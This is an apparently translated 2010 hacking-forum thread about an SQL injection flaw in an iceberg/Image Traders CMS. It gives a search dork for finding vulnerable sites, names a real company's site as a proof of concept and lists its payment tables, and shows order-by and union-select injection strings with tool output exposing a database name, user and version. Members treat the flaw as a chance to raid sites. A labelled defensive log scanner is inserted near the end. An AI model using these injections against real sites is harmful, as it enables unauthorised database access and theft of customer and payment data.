
[Bug] SQL injection in iceberg 'Content Management System'

Posted: Thu May 27, 2010 8:09 pm
by poni
The iceberg 'Content Management System' SQL Injection Vulnerability
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : by cyberlog
Published : 27.05.2010
Affected Software : imagetraders:iceberg_cms

==========================================================
The iceberg 'Content Management System' SQL Injection Vulnerability
==========================================================

# The iceberg 'Content Management System' SQL Injection Vulnerability
# Homepage : http://www.imagetraders.com.au
# Discovered : by cyberlog
# Dork : details.php?p_id= 'Design & SEO by Image Traders Pty Ltd'
# Exploit : http://[target]/details.php?p_id=[SQL Injection]
# Thanks : r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz, jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiLL SarifJedul,wiro gendeng,Letjen,ridho_bugs,Ryan Kabrutz,Mathewsa.k.a Nyubicrew
# My Site : http://sekuritionline.net
# Channel : #sekuritionline
#special to Mama Sri Rahayu, Member& Staff Sekuritonline, C0li a.k.a antisecurity [ borrowed his perl script ] :),
Inj3ct0r Now Brothers with Sekuritionline
==============================================
We never die !!!! indonesian Underground Community
KacrUt I L0v3 U :P
Give me NOCAN Brothers :P
am nt hacker just Lik3 Syst3m S3curity

References :
http://xforce.iss.net/xforce/xfdb/58617
http://www.vupen.com/english/advisories/2010/1161
http://www.osvdb.org/64694
http://www.exploit-db.com/exploits/12620
http://secunia.com/advisories/39833
http://packetstormsecurity.org/1005-exp ... rg-sql.txt

Re: [Bug] SQL injection in iceberg 'Content Management Syst

Posted: Thu May 27, 2010 8:18 pm
by baidhowi
Wow, bro poni, you really are unstoppable :love:

Thanks, sir

Re: [Bug] SQL injection in iceberg 'Content Management Syst

Posted: Thu May 27, 2010 8:21 pm
by poni
Above is one of the SQL injection bugs found by cyberlog from our sister forum sekuritionline, in the imagetrader CMS product owned by iceberg. As a POC, let's look at the website below:

Code:

http://www.wielandhelicopters.com.au/details.php?p_id=62'
and after checking, the following was found:

Code:

database = wiehel1_wielandhelicopters0com0au

and it consists of the tables
From here, please study it yourself.

Re: [Bug] SQL injection in iceberg 'Content Management Syst

Posted: Thu May 27, 2010 10:39 pm
by shinichi81
Permission to study this, bro poni........

Re: [Bug] SQL injection in iceberg 'Content Management Syst

Posted: Fri May 28, 2010 7:04 am
by 3xtr3m3b0y
poni wrote: and after checking, the following was found:

Code:

database = wiehel1_wielandhelicopters0com0au

and it consists of the tables
cart_product 	
cart_payment_type 	
cart_payment_paypal 	
cart_payment_cc 	
cart_payment_bankdep 	
cart_payment 	
cart_option 	
cart_history 	
cart_config 		
Oh nooooo... :pusing:
Oh God, strengthen my heart... :cry:
Nice share Master PONI... :love:

Re: [Bug] SQL injection in iceberg 'Content Management Syst

Posted: Fri May 28, 2010 2:05 pm
by peniru
Awesome bro, permission to explore :love: :love:

Re: [Bug] SQL injection in iceberg 'Content Management Syst

Posted: Fri May 28, 2010 2:57 pm
by peniru
I just got something like this....
http://www.target.com.au/details.php?p_id=269 order by 1-- (no error)
but with this
http://www.target.com.au/details.php?p_id=269 order by 2-- (why does it error?)

Please enlighten me :mati: :mati:

Re: [Bug] SQL injection in iceberg 'Content Management Syst

Posted: Fri May 28, 2010 3:00 pm
by iwan
A delicious meallllll.. :tapa: :tapa:

huwahahaha.. :ngakak: :ngakak:

Re: [Bug] SQL injection in iceberg 'Content Management Syst

Posted: Fri May 28, 2010 3:37 pm
by peniru
Whoa, finally managed to find one.... just by paying attention to the type of error, the number of columns can be found :devil :devil

Code:

URL:http://www.imagetraders.com.au/details.php?p_id=-1+union+all+select+1,darkc0de,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
[+] Evasion Used: "+" "--"
[+] 15:32:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: imatra_imagetraders0com0au
	User: imatra_cms@localhost
	Version: 5.0.90-community
CMIIW :love: :love:
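
Added example, not part of the thread: a log check that a site owner running this CMS could use to find the probes shown in the posts above (a trailing quote, `order by N`, `union ... select`) in requests to `details.php`. The log lines are constructed, and the log format, rule names and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = """\
203.0.113.7 - - [27/May/2010:20:21:03 +0700] "GET /details.php?p_id=62 HTTP/1.1" 200 5120
203.0.113.7 - - [27/May/2010:20:21:09 +0700] "GET /details.php?p_id=62' HTTP/1.1" 200 731
198.51.100.4 - - [28/May/2010:14:57:12 +0700] "GET /details.php?p_id=269%20order%20by%202-- HTTP/1.1" 200 640
198.51.100.4 - - [28/May/2010:15:32:20 +0700] "GET /details.php?p_id=-1+union+all+select+1,2,3-- HTTP/1.1" 200 2210
192.0.2.15 - - [28/May/2010:15:40:00 +0700] "GET /index.php?page=2 HTTP/1.1" 200 9000
"""

# Client address and request target; the target may contain raw spaces.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Checked in order; the first match names the finding.
RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("quote-probe", re.compile(r"['\"]")),
]

def classify(value):
    """Return None for a plain numeric id, else the name of the matching rule."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    for name, rx in RULES:
        if rx.search(value):
            return name
    return "non-numeric"  # anything else that is not an integer id

def scan(log_text, script="/details.php", param="p_id"):
    """Return (client, rule, decoded value) for each suspicious p_id request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(script):
            continue
        # parse_qs URL-decodes the value, so %20 and + both become spaces.
        for value in parse_qs(url.query).get(param, []):
            verdict = classify(value)
            if verdict:
                findings.append((client, verdict, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any hit on a parameter that should only ever be an integer is worth reviewing; on the application side the fix is to cast `p_id` to an integer or bind it in a prepared statement.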

Re: [Bug] SQL injection in iceberg 'Content Management Syst

Posted: Sat May 29, 2010 8:56 pm
by abit doang
nice,...
I'll just hit it with fuzz,..
bear with me, I'm a newbie...
:tapa: